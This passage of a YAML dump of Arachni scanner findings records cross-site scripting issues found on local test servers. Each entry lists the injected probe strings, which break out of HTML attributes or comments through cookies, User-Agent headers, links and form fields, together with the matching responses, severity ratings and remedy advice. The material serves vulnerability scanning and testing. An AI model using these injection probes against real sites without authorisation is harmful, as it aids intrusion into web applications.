    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "\" arachni_xss_in_tag=\"71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        cookie2: cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/cookie/double
      :match: <a href="/" class="cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class="cookie value" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/cookie/double
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: header
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/header/no
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "123"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: " arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        User-Agent: arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/header/no
      :match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class=arachni_user arachni_xss_in_tag=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/header/no
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: header
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/header/single
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "127"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        User-Agent: arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/header/single
      :match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class='arachni_user' arachni_xss_in_tag='71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1'>Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/header/single
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded in a HTML element.
        This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
  elem: header
  internal_modname: XSSHTMLTag
  method: GET
  mod_name: XSS in HTML tag
  name: Cross-Site Scripting in HTML tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:14528/header/double
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded in a HTML element.
          This can lead to a Cross-Site Scripting vulnerability or a form of HTML manipulation.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie=cookie+value;cookie1=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "127"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSHTMLTag
    method: GET
    mod_name: XSS in HTML tag
    name: Cross-Site Scripting in HTML tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "\" arachni_xss_in_tag=\"71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        User-Agent: arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:14528/header/double
      :match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <a href="/" class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <a href='/' class="arachni_user" arachni_xss_in_tag="71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1">Vuln</a>
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:14528/header/double
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: form
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "88"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :altered: input
      :element: form
      :params: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :follow_location: true
      :injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :combo: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :action: http://localhost:11161/form/straight
      :match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: form
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/form/in_comment
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "115"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :altered: input
      :element: form
      :params: 
        input: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :follow_location: true
      :injected: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :combo: 
        input: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :action: http://localhost:11161/form/in_comment
      :match: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: "        <!-- --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!-- -->\n"
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/form/in_comment
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: link
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/link/in_textfield?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "114"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :altered: input
      :element: link
      :params: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :follow_location: true
      :injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :combo: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :action: http://localhost:11161/link/in_textfield?input=default
      :match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: "    <textarea><some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/></textarea>\n"
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/link/in_textfield?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: link
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "88"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :altered: input
      :element: link
      :params: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :follow_location: true
      :injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :combo: 
        input: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :action: http://localhost:11161/link/straight?input=default
      :match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: link
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/link/in_comment?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "115"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :altered: input
      :element: link
      :params: 
        input: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :follow_location: true
      :injected: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :combo: 
        input: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :action: http://localhost:11161/link/in_comment?input=default
      :match: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!--
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: "        <!-- --> <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/> <!-- -->\n"
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/link/in_comment?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: cookie
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=<some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "88"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
